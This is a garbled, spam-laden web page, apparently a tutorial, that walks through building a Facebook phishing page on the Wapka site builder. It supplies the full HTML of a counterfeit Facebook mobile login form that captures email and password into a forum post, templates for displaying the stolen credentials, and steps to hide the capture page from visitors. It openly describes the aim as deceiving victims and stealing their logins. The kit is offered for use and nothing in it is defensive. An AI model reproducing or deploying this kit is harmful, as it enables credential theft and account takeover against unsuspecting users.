Wapka Facebook Phishing

Here i will U Giv U Step wise U Just Folow @ Step 1: At First Go to wapka.mobi and signup a new account. Enter into the site in 'Admin mode' Goto Edit site-wml/xhtml Code and paste this code..Wapka facebook phishing code 2015

Wapka.mobi Facebook Phishing

Common testify mp3 juices. #Hack Facebook Account using WAPKA Phishing Page.!! What is Phishing? Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards.


Watch the thieves 2012

  • Create facebook pishing site from wapka Step 1: Register a new Wapka Account First create a new wapka account & verify Your Email id Click Here www.wapka.com Step 2: Now l. TOP COMMENTATORS WIDGET FOR BLOGGER BLOG.
  • Create facebook pishing site from wapka Step 1: Register a new Wapka Account First create a new wapka account & verify Your Email id Click Here www.wapka.com Step 2: Now l. TOP COMMENTATORS WIDGET FOR BLOGGER BLOG.
Wapka Facebook Phishing
<?php<link rel='stylesheet' type='text/css' href='http://www.exnasir.tk/css_collection_nasir/facebook_phishing_nasir.css' media='all,handheld'/><link rel='shortcut icon' href='http://www.banglatext.com/img/facebook.png'/><body class='nontouch acw'><div class='mfsm'><div id='viewport'><div id='root' class='acw'><div class='acb aps'><a href='/home.php?refid=9'><img class='img img' src='http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png' width='76' height='20' alt='facebook' /></a></div><div id='objects_container'><div class='acy aps abb'><span class='mfss'><b>You must log in first.</b></span></div><div class='aclb'><div class='loginInner'><form method='post' class='mobile-login-form' onSubmit='window.open('http://facebook.com')' action='bforum_add_1.xhtml'><div><div class='mobile-login-field mobile-login-field-email aclb apl'><div>Email or Phone<input class='input' name='meno' type='text' /></div></div><div class='mobile-login-field aclb apl'><div>Password<br /><input class='input' name='text' type='password' /></div></div></div><br /><input type='hidden' name='blog' value='1' /><br /><div class='aclb apl'><input value='Log In' name='submit' type='submit' class='btn btnC' /></div></form><div class='aclb apl'><span class='mfss fcg'><a href='http://trickbd.com'>Forgot password?</a><br />Trouble logging in? <a href='http://fb.com/masterblaster.mahdi'>Try the alternative login</a>.</span></div><div class='aclb apl abt'><span class='mfss fcg'>Need a Facebook account?
a href='http://trickbd.com/login_site_0.xhtml'>Sign up here</a>.</span></div></div></div><div class='acw apm'><span class='mfss'><a href='/help/?refid=9'>Help Center</a></span></div></div><div id='footer'><div class='acg apm'><span class='mfss fcg'><b>English (US)</b> <span role='separator' aria-hidden='true'>·</span> <a class='sec' href='/a/language.php?l=es_LA&gfid=AQASXFHz80XXJ9cN&refid=9'>Español</a> <span role='separator' aria-hidden='true'>·</span> <a class='sec' href='/a/language.php?l=pt_BR&gfid=AQDCZxXRzMMRcr95&refid=9'>Português (Brasil)</a> <span role='separator' aria-hidden='true'>·</span> <a class='sec' href='/language.php?refid=9'>More…</a></span></div><div class='acg apm'><span class='mfss fcg'>Facebook © 2013</span></div></div></div></div><input type='hidden' id='m_user_DEPRECATED' value='0' /><div id='static_templates'></div></div></body>?>
@ Step 2: Goto Edit site-New Page and create a new named'Seting'page. (view in Admin mood) Now pastethis code into that site as wml/ xhtml code.Wapka facebook phishing code 2015
Full tutorial about making a phisihisg site by
<a href='https://www.facebook.com/pavandbest'>PaVaN RockEr</a>
U Must enter into this page as user and Follow this steps..
#1. <a href='registration_site.xhtml?do_id=1'><br />SignUp</a> (Step1)
#2. <a href='login_site.html?do_id=46'>Create new blog</a> (Step 2)
<font color='grey'>Count of letters in the title Must be (10-100)
Count of letters in text must be in (200-2000)</font>?>
Wapka facebook phishing code@ Step 3: Enter into your site as a User and follow the steps which are described into site'Setting'
@ Step 4: Enter into your site again as Admin mode and goto Edit site-Users-items visiblity select the page'setting' and keep it into Only in admin modeStep
@ 5: Edit site-wap2-Styles for content in forum/chat-Set global settings of styles for forum/ chat-or set own form for:-Messages in forum Clear all text from all 3 text area andpaste this
@ 1st textarea
<?php<b>Email:</b> ::
Pass:<fontcolor='red'> ::msg:: </font>
font color='grey'> 8ate:: </font>?>
2nd text Area </b> 3rd text area 3rd text area
This phishing site is scripted by
<?php<a href=' https://www.facebook.com /pavandbest'>PaVaNrocker</a>
@ After completing all steps you may use this code to remove wapka tags

Wapka Facebook Phishing Code 2015
